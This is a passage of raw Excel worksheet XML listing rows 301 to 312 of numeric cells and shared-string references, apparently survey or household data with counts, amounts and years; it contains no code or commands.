      </c>
      <c r="AW301">
        <v>0</v>
      </c>
      <c r="AX301">
        <v>0</v>
      </c>
      <c r="AY301">
        <v>240</v>
      </c>
      <c r="AZ301">
        <v>101</v>
      </c>
      <c r="BA301" t="s">
        <v>16810</v>
      </c>
      <c r="BB301" t="s">
        <v>14643</v>
      </c>
      <c r="BC301" t="s">
        <v>9550</v>
      </c>
      <c r="BD301" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="302" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A302">
        <v>1238</v>
      </c>
      <c r="B302" t="s">
        <v>344</v>
      </c>
      <c r="C302" t="s">
        <v>157</v>
      </c>
      <c r="D302" t="s">
        <v>2532</v>
      </c>
      <c r="E302" t="s">
        <v>142</v>
      </c>
      <c r="F302" t="s">
        <v>2533</v>
      </c>
      <c r="G302" s="1">
        <v>43941</v>
      </c>
      <c r="H302">
        <v>269</v>
      </c>
      <c r="I302">
        <v>269</v>
      </c>
      <c r="J302">
        <v>1</v>
      </c>
      <c r="K302">
        <v>1</v>
      </c>
      <c r="L302">
        <v>4</v>
      </c>
      <c r="M302">
        <v>0</v>
      </c>
      <c r="N302">
        <v>0</v>
      </c>
      <c r="O302">
        <v>0</v>
      </c>
      <c r="P302">
        <v>0</v>
      </c>
      <c r="Q302">
        <v>2</v>
      </c>
      <c r="R302">
        <v>8</v>
      </c>
      <c r="S302">
        <v>0</v>
      </c>
      <c r="T302">
        <v>2</v>
      </c>
      <c r="U302">
        <v>96000</v>
      </c>
      <c r="V302">
        <v>10000</v>
      </c>
      <c r="W302">
        <v>5000</v>
      </c>
      <c r="X302">
        <v>0</v>
      </c>
      <c r="Y302">
        <v>0</v>
      </c>
      <c r="Z302">
        <v>0</v>
      </c>
      <c r="AA302">
        <v>0</v>
      </c>
      <c r="AB302">
        <v>100</v>
      </c>
      <c r="AC302">
        <v>5000</v>
      </c>
      <c r="AD302">
        <v>0</v>
      </c>
      <c r="AE302">
        <v>90000</v>
      </c>
      <c r="AF302" t="s">
        <v>2534</v>
      </c>
      <c r="AG302">
        <v>60293</v>
      </c>
      <c r="AH302">
        <v>16</v>
      </c>
      <c r="AJ302">
        <v>264</v>
      </c>
      <c r="AK302" t="s">
        <v>2477</v>
      </c>
      <c r="AL302" t="s">
        <v>162</v>
      </c>
      <c r="AM302" t="s">
        <v>2535</v>
      </c>
      <c r="AN302" t="s">
        <v>55</v>
      </c>
      <c r="AO302">
        <v>2015</v>
      </c>
      <c r="AP302" t="s">
        <v>2536</v>
      </c>
      <c r="AQ302" t="s">
        <v>2537</v>
      </c>
      <c r="AR302" t="s">
        <v>2538</v>
      </c>
      <c r="AS302" t="s">
        <v>71</v>
      </c>
      <c r="AT302" t="s">
        <v>86</v>
      </c>
      <c r="AU302">
        <v>24</v>
      </c>
      <c r="AV302">
        <v>3</v>
      </c>
      <c r="AW302">
        <v>141</v>
      </c>
      <c r="AX302">
        <v>108</v>
      </c>
      <c r="AY302">
        <v>18</v>
      </c>
      <c r="AZ302">
        <v>9</v>
      </c>
      <c r="BA302" t="s">
        <v>16826</v>
      </c>
      <c r="BB302" t="s">
        <v>14801</v>
      </c>
      <c r="BC302" t="s">
        <v>9870</v>
      </c>
      <c r="BD302" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="303" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A303">
        <v>1503</v>
      </c>
      <c r="B303" t="s">
        <v>2539</v>
      </c>
      <c r="C303" t="s">
        <v>157</v>
      </c>
      <c r="D303" t="s">
        <v>2540</v>
      </c>
      <c r="E303" t="s">
        <v>363</v>
      </c>
      <c r="F303" t="s">
        <v>2541</v>
      </c>
      <c r="G303" s="1">
        <v>43942</v>
      </c>
      <c r="H303">
        <v>284</v>
      </c>
      <c r="I303">
        <v>284</v>
      </c>
      <c r="J303">
        <v>0</v>
      </c>
      <c r="K303">
        <v>0</v>
      </c>
      <c r="L303">
        <v>0</v>
      </c>
      <c r="M303">
        <v>0</v>
      </c>
      <c r="N303">
        <v>0</v>
      </c>
      <c r="O303">
        <v>0</v>
      </c>
      <c r="P303">
        <v>0</v>
      </c>
      <c r="Q303">
        <v>2</v>
      </c>
      <c r="R303">
        <v>2</v>
      </c>
      <c r="S303">
        <v>0</v>
      </c>
      <c r="T303">
        <v>1</v>
      </c>
      <c r="U303">
        <v>0</v>
      </c>
      <c r="V303">
        <v>0</v>
      </c>
      <c r="W303">
        <v>0</v>
      </c>
      <c r="X303">
        <v>0</v>
      </c>
      <c r="Y303">
        <v>0</v>
      </c>
      <c r="Z303">
        <v>0</v>
      </c>
      <c r="AA303">
        <v>0</v>
      </c>
      <c r="AB303">
        <v>2000</v>
      </c>
      <c r="AC303">
        <v>2000</v>
      </c>
      <c r="AD303">
        <v>0</v>
      </c>
      <c r="AE303">
        <v>2000</v>
      </c>
      <c r="AF303" t="s">
        <v>2542</v>
      </c>
      <c r="AG303">
        <v>60186</v>
      </c>
      <c r="AH303">
        <v>16</v>
      </c>
      <c r="AJ303">
        <v>264</v>
      </c>
      <c r="AK303" t="s">
        <v>2543</v>
      </c>
      <c r="AL303" t="s">
        <v>2544</v>
      </c>
      <c r="AM303" t="s">
        <v>2545</v>
      </c>
      <c r="AN303" t="s">
        <v>55</v>
      </c>
      <c r="AO303">
        <v>2018</v>
      </c>
      <c r="AP303">
        <v>81233720928</v>
      </c>
      <c r="AQ303" t="s">
        <v>2546</v>
      </c>
      <c r="AR303" t="s">
        <v>2542</v>
      </c>
      <c r="AS303" t="s">
        <v>71</v>
      </c>
      <c r="AT303" t="s">
        <v>58</v>
      </c>
      <c r="AU303">
        <v>25</v>
      </c>
      <c r="AV303">
        <v>1</v>
      </c>
      <c r="AW303">
        <v>5</v>
      </c>
      <c r="AX303">
        <v>5</v>
      </c>
      <c r="AY303">
        <v>8</v>
      </c>
      <c r="AZ303">
        <v>3</v>
      </c>
      <c r="BA303" t="s">
        <v>16916</v>
      </c>
      <c r="BB303" t="s">
        <v>15325</v>
      </c>
      <c r="BC303" t="s">
        <v>9485</v>
      </c>
      <c r="BD303" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="304" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A304">
        <v>1257</v>
      </c>
      <c r="B304" t="s">
        <v>2547</v>
      </c>
      <c r="C304" t="s">
        <v>157</v>
      </c>
      <c r="D304" t="s">
        <v>2548</v>
      </c>
      <c r="E304" t="s">
        <v>809</v>
      </c>
      <c r="F304" t="s">
        <v>2549</v>
      </c>
      <c r="G304" s="1">
        <v>44098</v>
      </c>
      <c r="H304">
        <v>285</v>
      </c>
      <c r="I304">
        <v>285</v>
      </c>
      <c r="J304">
        <v>3</v>
      </c>
      <c r="K304">
        <v>1</v>
      </c>
      <c r="L304">
        <v>2</v>
      </c>
      <c r="M304">
        <v>0</v>
      </c>
      <c r="N304">
        <v>0</v>
      </c>
      <c r="O304">
        <v>0</v>
      </c>
      <c r="P304">
        <v>0</v>
      </c>
      <c r="Q304">
        <v>0</v>
      </c>
      <c r="R304">
        <v>0</v>
      </c>
      <c r="S304">
        <v>0</v>
      </c>
      <c r="T304">
        <v>1</v>
      </c>
      <c r="U304">
        <v>90000</v>
      </c>
      <c r="V304">
        <v>0</v>
      </c>
      <c r="W304">
        <v>2000</v>
      </c>
      <c r="X304">
        <v>0</v>
      </c>
      <c r="Y304">
        <v>0</v>
      </c>
      <c r="Z304">
        <v>0</v>
      </c>
      <c r="AA304">
        <v>0</v>
      </c>
      <c r="AB304">
        <v>0</v>
      </c>
      <c r="AC304">
        <v>0</v>
      </c>
      <c r="AD304">
        <v>0</v>
      </c>
      <c r="AE304">
        <v>8500</v>
      </c>
      <c r="AF304" t="s">
        <v>2550</v>
      </c>
      <c r="AG304">
        <v>60291</v>
      </c>
      <c r="AH304">
        <v>16</v>
      </c>
      <c r="AJ304">
        <v>264</v>
      </c>
      <c r="AK304" t="s">
        <v>1608</v>
      </c>
      <c r="AL304" t="s">
        <v>2230</v>
      </c>
      <c r="AM304" t="s">
        <v>2551</v>
      </c>
      <c r="AN304" t="s">
        <v>55</v>
      </c>
      <c r="AO304">
        <v>2013</v>
      </c>
      <c r="AP304" t="s">
        <v>2552</v>
      </c>
      <c r="AQ304" t="s">
        <v>2553</v>
      </c>
      <c r="AR304" t="s">
        <v>2550</v>
      </c>
      <c r="AS304" t="s">
        <v>71</v>
      </c>
      <c r="AT304" t="s">
        <v>58</v>
      </c>
      <c r="AU304">
        <v>22</v>
      </c>
      <c r="AV304">
        <v>1</v>
      </c>
      <c r="AW304">
        <v>5</v>
      </c>
      <c r="AX304">
        <v>33</v>
      </c>
      <c r="AY304">
        <v>11</v>
      </c>
      <c r="AZ304">
        <v>6</v>
      </c>
      <c r="BA304" t="s">
        <v>16831</v>
      </c>
      <c r="BB304" t="s">
        <v>15158</v>
      </c>
      <c r="BC304">
        <v>0</v>
      </c>
      <c r="BD304" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="305" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A305">
        <v>1240</v>
      </c>
      <c r="B305" t="s">
        <v>2554</v>
      </c>
      <c r="C305" t="s">
        <v>199</v>
      </c>
      <c r="D305" t="s">
        <v>2555</v>
      </c>
      <c r="E305" t="s">
        <v>111</v>
      </c>
      <c r="F305" t="s">
        <v>2556</v>
      </c>
      <c r="G305" s="1">
        <v>43910</v>
      </c>
      <c r="H305">
        <v>411</v>
      </c>
      <c r="I305">
        <v>411</v>
      </c>
      <c r="J305">
        <v>2</v>
      </c>
      <c r="K305">
        <v>1</v>
      </c>
      <c r="L305">
        <v>2</v>
      </c>
      <c r="M305">
        <v>1</v>
      </c>
      <c r="N305">
        <v>0</v>
      </c>
      <c r="O305">
        <v>0</v>
      </c>
      <c r="P305">
        <v>0</v>
      </c>
      <c r="Q305">
        <v>5</v>
      </c>
      <c r="R305">
        <v>10</v>
      </c>
      <c r="S305">
        <v>1</v>
      </c>
      <c r="T305">
        <v>0</v>
      </c>
      <c r="U305">
        <v>10000</v>
      </c>
      <c r="V305">
        <v>1</v>
      </c>
      <c r="W305">
        <v>5000</v>
      </c>
      <c r="X305">
        <v>350</v>
      </c>
      <c r="Y305">
        <v>0</v>
      </c>
      <c r="Z305">
        <v>0</v>
      </c>
      <c r="AA305">
        <v>0</v>
      </c>
      <c r="AB305">
        <v>50</v>
      </c>
      <c r="AC305">
        <v>500</v>
      </c>
      <c r="AD305">
        <v>1</v>
      </c>
      <c r="AE305">
        <v>0</v>
      </c>
      <c r="AF305" t="s">
        <v>2557</v>
      </c>
      <c r="AG305">
        <v>0</v>
      </c>
      <c r="AH305">
        <v>1</v>
      </c>
      <c r="AJ305">
        <v>19</v>
      </c>
      <c r="AK305" t="s">
        <v>2558</v>
      </c>
      <c r="AL305" t="s">
        <v>2559</v>
      </c>
      <c r="AM305" t="s">
        <v>2560</v>
      </c>
      <c r="AN305" t="s">
        <v>55</v>
      </c>
      <c r="AO305">
        <v>2017</v>
      </c>
      <c r="AP305" t="s">
        <v>2561</v>
      </c>
      <c r="AQ305" t="s">
        <v>2562</v>
      </c>
      <c r="AR305" t="s">
        <v>2563</v>
      </c>
      <c r="AS305" t="s">
        <v>71</v>
      </c>
      <c r="AT305" t="s">
        <v>58</v>
      </c>
      <c r="AU305">
        <v>25</v>
      </c>
      <c r="AV305">
        <v>1</v>
      </c>
      <c r="AW305">
        <v>10</v>
      </c>
      <c r="AX305">
        <v>1</v>
      </c>
      <c r="AY305">
        <v>17</v>
      </c>
      <c r="AZ305">
        <v>4</v>
      </c>
      <c r="BA305" t="s">
        <v>16827</v>
      </c>
      <c r="BB305" t="s">
        <v>15147</v>
      </c>
      <c r="BC305" t="s">
        <v>10449</v>
      </c>
      <c r="BD305" t="s">
        <v>10450</v>
      </c>
    </row>
    <row r="306" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A306">
        <v>853</v>
      </c>
      <c r="B306" t="s">
        <v>2564</v>
      </c>
      <c r="C306" t="s">
        <v>168</v>
      </c>
      <c r="D306" t="s">
        <v>2565</v>
      </c>
      <c r="E306" t="s">
        <v>111</v>
      </c>
      <c r="F306" t="s">
        <v>2566</v>
      </c>
      <c r="G306" s="1">
        <v>43987</v>
      </c>
      <c r="H306">
        <v>414</v>
      </c>
      <c r="I306">
        <v>414</v>
      </c>
      <c r="J306">
        <v>4</v>
      </c>
      <c r="K306">
        <v>0</v>
      </c>
      <c r="L306">
        <v>3</v>
      </c>
      <c r="M306">
        <v>0</v>
      </c>
      <c r="N306">
        <v>0</v>
      </c>
      <c r="O306">
        <v>0</v>
      </c>
      <c r="P306">
        <v>0</v>
      </c>
      <c r="Q306">
        <v>0</v>
      </c>
      <c r="R306">
        <v>0</v>
      </c>
      <c r="S306">
        <v>0</v>
      </c>
      <c r="T306">
        <v>0</v>
      </c>
      <c r="U306">
        <v>60</v>
      </c>
      <c r="V306">
        <v>0</v>
      </c>
      <c r="W306">
        <v>6</v>
      </c>
      <c r="X306">
        <v>0</v>
      </c>
      <c r="Y306">
        <v>0</v>
      </c>
      <c r="Z306">
        <v>0</v>
      </c>
      <c r="AA306">
        <v>0</v>
      </c>
      <c r="AB306">
        <v>0</v>
      </c>
      <c r="AC306">
        <v>0</v>
      </c>
      <c r="AD306">
        <v>0</v>
      </c>
      <c r="AE306">
        <v>0</v>
      </c>
      <c r="AF306" t="s">
        <v>2567</v>
      </c>
      <c r="AG306">
        <v>43364</v>
      </c>
      <c r="AH306">
        <v>13</v>
      </c>
      <c r="AJ306">
        <v>162</v>
      </c>
      <c r="AK306" t="s">
        <v>1109</v>
      </c>
      <c r="AL306" t="s">
        <v>1109</v>
      </c>
      <c r="AM306" t="s">
        <v>2568</v>
      </c>
      <c r="AN306" t="s">
        <v>55</v>
      </c>
      <c r="AO306">
        <v>2011</v>
      </c>
      <c r="AP306" t="s">
        <v>2569</v>
      </c>
      <c r="AQ306" t="s">
        <v>2570</v>
      </c>
      <c r="AR306" t="s">
        <v>2571</v>
      </c>
      <c r="AS306" t="s">
        <v>71</v>
      </c>
      <c r="AT306" t="s">
        <v>58</v>
      </c>
      <c r="AU306">
        <v>30</v>
      </c>
      <c r="AV306">
        <v>1</v>
      </c>
      <c r="AW306">
        <v>6</v>
      </c>
      <c r="AX306">
        <v>4</v>
      </c>
      <c r="AY306">
        <v>12</v>
      </c>
      <c r="AZ306">
        <v>7</v>
      </c>
      <c r="BA306" t="s">
        <v>17161</v>
      </c>
      <c r="BB306">
        <v>0</v>
      </c>
      <c r="BC306">
        <v>0</v>
      </c>
      <c r="BD306" t="s">
        <v>10045</v>
      </c>
    </row>
    <row r="307" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A307">
        <v>958</v>
      </c>
      <c r="B307" t="s">
        <v>2572</v>
      </c>
      <c r="C307" t="s">
        <v>157</v>
      </c>
      <c r="D307" t="s">
        <v>1079</v>
      </c>
      <c r="E307" t="s">
        <v>142</v>
      </c>
      <c r="F307" t="s">
        <v>2573</v>
      </c>
      <c r="G307" s="1">
        <v>44182</v>
      </c>
      <c r="H307">
        <v>415</v>
      </c>
      <c r="I307">
        <v>415</v>
      </c>
      <c r="J307">
        <v>2</v>
      </c>
      <c r="K307">
        <v>0</v>
      </c>
      <c r="L307">
        <v>0</v>
      </c>
      <c r="M307">
        <v>0</v>
      </c>
      <c r="N307">
        <v>0</v>
      </c>
      <c r="O307">
        <v>0</v>
      </c>
      <c r="P307">
        <v>0</v>
      </c>
      <c r="Q307">
        <v>2</v>
      </c>
      <c r="R307">
        <v>0</v>
      </c>
      <c r="S307">
        <v>1</v>
      </c>
      <c r="T307">
        <v>1</v>
      </c>
      <c r="U307">
        <v>600</v>
      </c>
      <c r="V307">
        <v>0</v>
      </c>
      <c r="W307">
        <v>0</v>
      </c>
      <c r="X307">
        <v>0</v>
      </c>
      <c r="Y307">
        <v>0</v>
      </c>
      <c r="Z307">
        <v>0</v>
      </c>
      <c r="AA307">
        <v>0</v>
      </c>
      <c r="AB307">
        <v>150</v>
      </c>
      <c r="AC307">
        <v>0</v>
      </c>
      <c r="AD307">
        <v>1</v>
      </c>
      <c r="AE307">
        <v>70</v>
      </c>
      <c r="AF307" t="s">
        <v>2574</v>
      </c>
      <c r="AG307">
        <v>67154</v>
      </c>
      <c r="AH307">
        <v>16</v>
      </c>
      <c r="AJ307">
        <v>241</v>
      </c>
      <c r="AK307" t="s">
        <v>539</v>
      </c>
      <c r="AL307" t="s">
        <v>1082</v>
      </c>
      <c r="AM307" t="s">
        <v>2575</v>
      </c>
      <c r="AN307" t="s">
        <v>55</v>
      </c>
      <c r="AO307">
        <v>1997</v>
      </c>
      <c r="AP307" t="s">
        <v>2576</v>
      </c>
      <c r="AQ307" t="s">
        <v>2577</v>
      </c>
      <c r="AR307" t="s">
        <v>2578</v>
      </c>
      <c r="AS307" t="s">
        <v>71</v>
      </c>
      <c r="AT307" t="s">
        <v>58</v>
      </c>
      <c r="AU307">
        <v>45</v>
      </c>
      <c r="AV307">
        <v>1</v>
      </c>
      <c r="AW307">
        <v>0</v>
      </c>
      <c r="AX307">
        <v>0</v>
      </c>
      <c r="AY307">
        <v>58</v>
      </c>
      <c r="AZ307">
        <v>80</v>
      </c>
      <c r="BA307" t="s">
        <v>16783</v>
      </c>
      <c r="BB307" t="s">
        <v>14963</v>
      </c>
      <c r="BC307">
        <v>0</v>
      </c>
      <c r="BD307">
        <v>0</v>
      </c>
    </row>
    <row r="308" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A308">
        <v>1183</v>
      </c>
      <c r="B308" t="s">
        <v>2579</v>
      </c>
      <c r="C308" t="s">
        <v>157</v>
      </c>
      <c r="D308" t="s">
        <v>2580</v>
      </c>
      <c r="E308" t="s">
        <v>111</v>
      </c>
      <c r="F308" t="s">
        <v>2581</v>
      </c>
      <c r="G308" s="1">
        <v>43861</v>
      </c>
      <c r="H308">
        <v>461</v>
      </c>
      <c r="I308">
        <v>461</v>
      </c>
      <c r="J308">
        <v>1</v>
      </c>
      <c r="K308">
        <v>0</v>
      </c>
      <c r="L308">
        <v>2</v>
      </c>
      <c r="M308">
        <v>0</v>
      </c>
      <c r="N308">
        <v>0</v>
      </c>
      <c r="O308">
        <v>0</v>
      </c>
      <c r="P308">
        <v>0</v>
      </c>
      <c r="Q308">
        <v>2</v>
      </c>
      <c r="R308">
        <v>40</v>
      </c>
      <c r="S308">
        <v>0</v>
      </c>
      <c r="T308">
        <v>0</v>
      </c>
      <c r="U308">
        <v>60000</v>
      </c>
      <c r="V308">
        <v>0</v>
      </c>
      <c r="W308">
        <v>3000</v>
      </c>
      <c r="X308">
        <v>0</v>
      </c>
      <c r="Y308">
        <v>0</v>
      </c>
      <c r="Z308">
        <v>0</v>
      </c>
      <c r="AA308">
        <v>0</v>
      </c>
      <c r="AB308">
        <v>200</v>
      </c>
      <c r="AC308">
        <v>20</v>
      </c>
      <c r="AD308">
        <v>0</v>
      </c>
      <c r="AE308">
        <v>0</v>
      </c>
      <c r="AF308" t="s">
        <v>2582</v>
      </c>
      <c r="AG308">
        <v>60129</v>
      </c>
      <c r="AH308">
        <v>16</v>
      </c>
      <c r="AJ308">
        <v>264</v>
      </c>
      <c r="AK308" t="s">
        <v>2583</v>
      </c>
      <c r="AL308" t="s">
        <v>2584</v>
      </c>
      <c r="AM308" t="s">
        <v>2585</v>
      </c>
      <c r="AN308" t="s">
        <v>68</v>
      </c>
      <c r="AO308">
        <v>2018</v>
      </c>
      <c r="AP308" t="s">
        <v>2586</v>
      </c>
      <c r="AQ308" t="s">
        <v>2587</v>
      </c>
      <c r="AR308" t="s">
        <v>2582</v>
      </c>
      <c r="AU308">
        <v>25</v>
      </c>
      <c r="AV308">
        <v>1</v>
      </c>
      <c r="AW308">
        <v>6</v>
      </c>
      <c r="AX308">
        <v>3</v>
      </c>
      <c r="AY308">
        <v>8</v>
      </c>
      <c r="AZ308">
        <v>9</v>
      </c>
      <c r="BA308" t="s">
        <v>17163</v>
      </c>
      <c r="BB308" t="s">
        <v>15107</v>
      </c>
      <c r="BC308">
        <v>0</v>
      </c>
      <c r="BD308" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="309" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A309">
        <v>1691</v>
      </c>
      <c r="B309" t="s">
        <v>2588</v>
      </c>
      <c r="C309" t="s">
        <v>318</v>
      </c>
      <c r="D309" t="s">
        <v>2589</v>
      </c>
      <c r="E309" t="s">
        <v>300</v>
      </c>
      <c r="F309" t="s">
        <v>2590</v>
      </c>
      <c r="G309" s="1">
        <v>43858</v>
      </c>
      <c r="H309">
        <v>473</v>
      </c>
      <c r="I309">
        <v>473</v>
      </c>
      <c r="J309">
        <v>1</v>
      </c>
      <c r="K309">
        <v>0</v>
      </c>
      <c r="L309">
        <v>1</v>
      </c>
      <c r="M309">
        <v>0</v>
      </c>
      <c r="N309">
        <v>0</v>
      </c>
      <c r="O309">
        <v>0</v>
      </c>
      <c r="P309">
        <v>0</v>
      </c>
      <c r="Q309">
        <v>5</v>
      </c>
      <c r="R309">
        <v>5</v>
      </c>
      <c r="S309">
        <v>0</v>
      </c>
      <c r="T309">
        <v>0</v>
      </c>
      <c r="U309">
        <v>60</v>
      </c>
      <c r="V309">
        <v>0</v>
      </c>
      <c r="W309">
        <v>4</v>
      </c>
      <c r="X309">
        <v>0</v>
      </c>
      <c r="Y309">
        <v>0</v>
      </c>
      <c r="Z309">
        <v>0</v>
      </c>
      <c r="AA309">
        <v>0</v>
      </c>
      <c r="AB309">
        <v>2500</v>
      </c>
      <c r="AC309">
        <v>2500</v>
      </c>
      <c r="AD309">
        <v>0</v>
      </c>
      <c r="AE309">
        <v>0</v>
      </c>
      <c r="AF309" t="s">
        <v>2591</v>
      </c>
      <c r="AG309">
        <v>92255</v>
      </c>
      <c r="AH309">
        <v>26</v>
      </c>
      <c r="AJ309">
        <v>403</v>
      </c>
      <c r="AK309" t="s">
        <v>2255</v>
      </c>
      <c r="AL309" t="s">
        <v>2592</v>
      </c>
      <c r="AM309" t="s">
        <v>2593</v>
      </c>
      <c r="AN309" t="s">
        <v>55</v>
      </c>
      <c r="AO309">
        <v>2013</v>
      </c>
      <c r="AP309">
        <v>82188222280</v>
      </c>
      <c r="AQ309" t="s">
        <v>2594</v>
      </c>
      <c r="AR309" t="s">
        <v>2591</v>
      </c>
      <c r="AS309" t="s">
        <v>71</v>
      </c>
      <c r="AT309" t="s">
        <v>58</v>
      </c>
      <c r="AU309">
        <v>26</v>
      </c>
      <c r="AV309">
        <v>2</v>
      </c>
      <c r="AW309">
        <v>5</v>
      </c>
      <c r="AX309">
        <v>7</v>
      </c>
      <c r="AY309">
        <v>7</v>
      </c>
      <c r="AZ309">
        <v>1</v>
      </c>
      <c r="BA309" t="s">
        <v>16972</v>
      </c>
      <c r="BB309" t="s">
        <v>14877</v>
      </c>
      <c r="BC309">
        <v>0</v>
      </c>
      <c r="BD309" t="s">
        <v>9832</v>
      </c>
    </row>
    <row r="310" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A310">
        <v>1715</v>
      </c>
      <c r="B310" t="s">
        <v>2595</v>
      </c>
      <c r="C310" t="s">
        <v>60</v>
      </c>
      <c r="D310" t="s">
        <v>2596</v>
      </c>
      <c r="E310" t="s">
        <v>242</v>
      </c>
      <c r="F310" t="s">
        <v>2597</v>
      </c>
      <c r="G310" s="1">
        <v>44312</v>
      </c>
      <c r="H310">
        <v>538</v>
      </c>
      <c r="I310">
        <v>538</v>
      </c>
      <c r="J310">
        <v>1</v>
      </c>
      <c r="K310">
        <v>2</v>
      </c>
      <c r="L310">
        <v>1</v>
      </c>
      <c r="M310">
        <v>0</v>
      </c>
      <c r="N310">
        <v>0</v>
      </c>
      <c r="O310">
        <v>0</v>
      </c>
      <c r="P310">
        <v>4</v>
      </c>
      <c r="Q310">
        <v>2</v>
      </c>
      <c r="R310">
        <v>30</v>
      </c>
      <c r="S310">
        <v>0</v>
      </c>
      <c r="T310">
        <v>1</v>
      </c>
      <c r="U310">
        <v>10000</v>
      </c>
      <c r="V310">
        <v>20000</v>
      </c>
      <c r="W310">
        <v>5000</v>
      </c>
      <c r="X310">
        <v>0</v>
      </c>
      <c r="Y310">
        <v>0</v>
      </c>
      <c r="Z310">
        <v>0</v>
      </c>
      <c r="AA310">
        <v>2000</v>
      </c>
      <c r="AB310">
        <v>0</v>
      </c>
      <c r="AC310">
        <v>0</v>
      </c>
      <c r="AD310">
        <v>0</v>
      </c>
      <c r="AE310">
        <v>20000</v>
      </c>
      <c r="AF310" t="s">
        <v>2598</v>
      </c>
      <c r="AG310">
        <v>35361</v>
      </c>
      <c r="AH310">
        <v>10</v>
      </c>
      <c r="AJ310">
        <v>128</v>
      </c>
      <c r="AK310" t="s">
        <v>65</v>
      </c>
      <c r="AL310" t="s">
        <v>66</v>
      </c>
      <c r="AM310" t="s">
        <v>2599</v>
      </c>
      <c r="AN310" t="s">
        <v>55</v>
      </c>
      <c r="AO310">
        <v>2013</v>
      </c>
      <c r="AP310" t="s">
        <v>2600</v>
      </c>
      <c r="AQ310" t="s">
        <v>2601</v>
      </c>
      <c r="AR310" t="s">
        <v>2602</v>
      </c>
      <c r="AS310" t="s">
        <v>71</v>
      </c>
      <c r="AT310" t="s">
        <v>58</v>
      </c>
      <c r="AU310">
        <v>6</v>
      </c>
      <c r="AV310">
        <v>0</v>
      </c>
      <c r="AW310">
        <v>15</v>
      </c>
      <c r="AX310">
        <v>79</v>
      </c>
      <c r="AY310">
        <v>19</v>
      </c>
      <c r="AZ310">
        <v>7</v>
      </c>
      <c r="BA310" t="s">
        <v>16977</v>
      </c>
      <c r="BB310" t="s">
        <v>15469</v>
      </c>
      <c r="BC310">
        <v>0</v>
      </c>
      <c r="BD310" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="311" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A311">
        <v>1033</v>
      </c>
      <c r="B311" t="s">
        <v>2603</v>
      </c>
      <c r="C311" t="s">
        <v>47</v>
      </c>
      <c r="D311" t="s">
        <v>2604</v>
      </c>
      <c r="E311" t="s">
        <v>142</v>
      </c>
      <c r="F311" t="s">
        <v>2605</v>
      </c>
      <c r="G311" s="1">
        <v>44368</v>
      </c>
      <c r="H311">
        <v>599</v>
      </c>
      <c r="I311">
        <v>599</v>
      </c>
      <c r="J311">
        <v>2</v>
      </c>
      <c r="K311">
        <v>1</v>
      </c>
      <c r="L311">
        <v>3</v>
      </c>
      <c r="M311">
        <v>1</v>
      </c>
      <c r="N311">
        <v>0</v>
      </c>
      <c r="O311">
        <v>0</v>
      </c>
      <c r="P311">
        <v>0</v>
      </c>
      <c r="Q311">
        <v>10</v>
      </c>
      <c r="R311">
        <v>30</v>
      </c>
      <c r="S311">
        <v>1</v>
      </c>
      <c r="T311">
        <v>1</v>
      </c>
      <c r="U311">
        <v>700000</v>
      </c>
      <c r="V311">
        <v>1</v>
      </c>
      <c r="W311">
        <v>4000</v>
      </c>
      <c r="X311">
        <v>1500</v>
      </c>
      <c r="Y311">
        <v>0</v>
      </c>
      <c r="Z311">
        <v>0</v>
      </c>
      <c r="AA311">
        <v>0</v>
      </c>
      <c r="AB311">
        <v>3000</v>
      </c>
      <c r="AC311">
        <v>50</v>
      </c>
      <c r="AD311">
        <v>1</v>
      </c>
      <c r="AE311">
        <v>100000</v>
      </c>
      <c r="AF311" t="s">
        <v>2606</v>
      </c>
      <c r="AG311">
        <v>22616</v>
      </c>
      <c r="AH311">
        <v>2</v>
      </c>
      <c r="AJ311">
        <v>27</v>
      </c>
      <c r="AK311" t="s">
        <v>2607</v>
      </c>
      <c r="AL311" t="s">
        <v>2608</v>
      </c>
      <c r="AM311" t="s">
        <v>2609</v>
      </c>
      <c r="AN311" t="s">
        <v>55</v>
      </c>
      <c r="AO311">
        <v>2009</v>
      </c>
      <c r="AP311" t="s">
        <v>2610</v>
      </c>
      <c r="AQ311">
        <v>89638375724</v>
      </c>
      <c r="AR311" t="s">
        <v>2611</v>
      </c>
      <c r="AS311" t="s">
        <v>71</v>
      </c>
      <c r="AT311" t="s">
        <v>58</v>
      </c>
      <c r="AU311">
        <v>14</v>
      </c>
      <c r="AV311">
        <v>1</v>
      </c>
      <c r="AW311">
        <v>8</v>
      </c>
      <c r="AX311">
        <v>19</v>
      </c>
      <c r="AY311">
        <v>5</v>
      </c>
      <c r="AZ311">
        <v>11</v>
      </c>
      <c r="BA311" t="s">
        <v>16793</v>
      </c>
      <c r="BB311" t="s">
        <v>15014</v>
      </c>
      <c r="BC311" t="s">
        <v>14150</v>
      </c>
      <c r="BD311">
        <v>0</v>
      </c>
    </row>
    <row r="312" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A312">
        <v>908</v>
      </c>
      <c r="B312" t="s">
        <v>2612</v>
      </c>
      <c r="C312" t="s">
        <v>60</v>
      </c>
      <c r="D312" t="s">
        <v>2613</v>
      </c>
      <c r="E312" t="s">
        <v>242</v>
      </c>
      <c r="F312" t="s">
        <v>2614</v>
      </c>
      <c r="G312" s="1">
        <v>43997</v>
      </c>
      <c r="H312">
        <v>612</v>
      </c>
      <c r="I312">
        <v>612</v>
      </c>
      <c r="J312">
        <v>3</v>
      </c>
      <c r="K312">
        <v>4</v>
      </c>
      <c r="L312">
        <v>1</v>
      </c>
      <c r="M312">
        <v>0</v>
      </c>
      <c r="N312">
        <v>4000</v>
      </c>
      <c r="O312">
        <v>0</v>
      </c>
      <c r="P312">
        <v>2</v>
      </c>
      <c r="Q312">
        <v>0</v>
      </c>
      <c r="R312">
        <v>0</v>
      </c>
      <c r="S312">
        <v>0</v>
      </c>
      <c r="T312">
        <v>5</v>
      </c>
      <c r="U312">
